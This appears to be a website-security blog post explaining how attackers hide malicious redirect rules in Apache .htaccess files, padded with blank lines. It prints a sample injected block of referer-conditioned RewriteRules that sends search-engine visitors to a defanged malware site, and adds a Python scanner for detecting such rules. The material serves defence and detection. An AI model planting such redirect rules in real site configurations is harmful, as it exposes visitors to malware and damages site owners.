Malicious hackers are continuously changing the tactics they use to compromise websites. Over 6,600 new websites are hacked and blacklisted every day and begin distributing malware to potential customers and visitors, destroying their owners’ online reputation.
One of the primary mechanisms used to infect visitors to a website is insertion of malicious code into a file called “.htaccess”. Hackers use this mechanism to infect benign and insecure websites.
About the attack
Websites are powered by a type of software called a “web server”. There are many different web servers, including IIS, NGINX, and others, with the most popular being Apache. Many web servers have a special per-directory configuration file: on Apache this file is called “.htaccess”. This file can specify rules that determine how and to whom your website should be visible.
Using this file hackers can even redirect your visitors to another website. Sometimes before inserting the malicious code inside this file, hackers will put in a large number of empty lines to make it harder to find. Make sure to check the complete “.htaccess” file for malware, not just the lines at the top.
Where are visitors redirected?
The following malicious websites have been used in this kind of redirection attack in the past few weeks. Visitors to benign, legitimate websites that have been compromised are often redirected to the malicious websites in the list below.
How do I identify the malicious code
Malicious code in a “.htaccess” file usually looks similar to the example below. Notice the “RewriteRule” statement that tells the web server to direct visitors to “hxxp://sokoloperkovuskeci.com/in.php” for any request to the site matching the “RewriteCond” statements.
This means visitors from many different search engines, including Ask, Google, MSN, and more, would be redirected to the malicious website.
RewriteCond %{HTTP_REFERER} .ask.com.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .google.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .msn.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .bing.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .live.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .aol.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .altavista.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .excite.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .search.yahoo$ [NC]
RewriteRule .* hxxp://sokoloperkovuskeci.com/in.php[removed] [R,L]
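One way to check a “.htaccess” file for this pattern is a small script that reports every RewriteRule whose target is an absolute URL on a host you do not own, counts the HTTP_REFERER conditions gating it, and measures the longest run of blank lines (the padding trick described above). This is an added example, not code from the original post; the sample file, the own_hosts value and the hostnames in it are constructed, and the defanged “hxxp” scheme is accepted alongside http(s) so the snippet above can be fed in as-is.

```python
import re

# Constructed sample modelled on the snippet above: a benign internal rule, then a long
# run of blank lines hiding a referer-conditioned redirect to an off-site (defanged) URL.
SAMPLE_HTACCESS = (
    "RewriteEngine On\n"
    "RewriteRule ^old\\.html$ /new.html [R=301,L]\n"
    + "\n" * 200
    + "RewriteCond %{HTTP_REFERER} .google.$ [NC,OR]\n"
    "RewriteCond %{HTTP_REFERER} .bing.com$ [NC,OR]\n"
    "RewriteCond %{HTTP_REFERER} .search.yahoo$ [NC]\n"
    "RewriteRule .* hxxp://sokoloperkovuskeci.com/in.php [R,L]\n"
)

REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I)
REWRITE_RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)
# Absolute target: hxxp is the defanged form used on this page, http(s) is what a live file holds.
EXTERNAL_TARGET = re.compile(r"^(?:hxxps?|https?)://([^/\s?#]+)", re.I)


def scan_htaccess(text, own_hosts=()):
    """Report RewriteRules that send visitors to a host outside own_hosts, how many
    HTTP_REFERER conditions gate each one, and the longest run of blank lines."""
    report = {"redirects": [], "max_blank_run": 0}
    pending_conds = 0  # HTTP_REFERER conditions seen since the last RewriteRule
    blank_run = 0
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            blank_run += 1
            report["max_blank_run"] = max(report["max_blank_run"], blank_run)
            continue
        blank_run = 0
        if REFERER_COND.match(line):
            pending_conds += 1
            continue
        rule = REWRITE_RULE.match(line)
        if rule:
            ext = EXTERNAL_TARGET.match(rule.group(2))
            if ext and ext.group(1).lower() not in own_hosts:
                report["redirects"].append({
                    "line": lineno, "host": ext.group(1).lower(),
                    "pattern": rule.group(1), "referer_conditions": pending_conds,
                })
            pending_conds = 0  # RewriteCond directives apply only to the next RewriteRule
    return report


if __name__ == "__main__":
    for hit in scan_htaccess(SAMPLE_HTACCESS, own_hosts=("example.com",))["redirects"]:
        print(f"line {hit['line']}: '{hit['pattern']}' -> {hit['host']} "
              f"({hit['referer_conditions']} HTTP_REFERER conditions)")
```

A large max_blank_run together with a referer-gated off-site redirect far down the file is exactly the signature described above; run the same scan over every .htaccess in the document root, since attackers plant them in subdirectories too.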
How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up to date on the latest ways that infections are spreading to legitimate websites.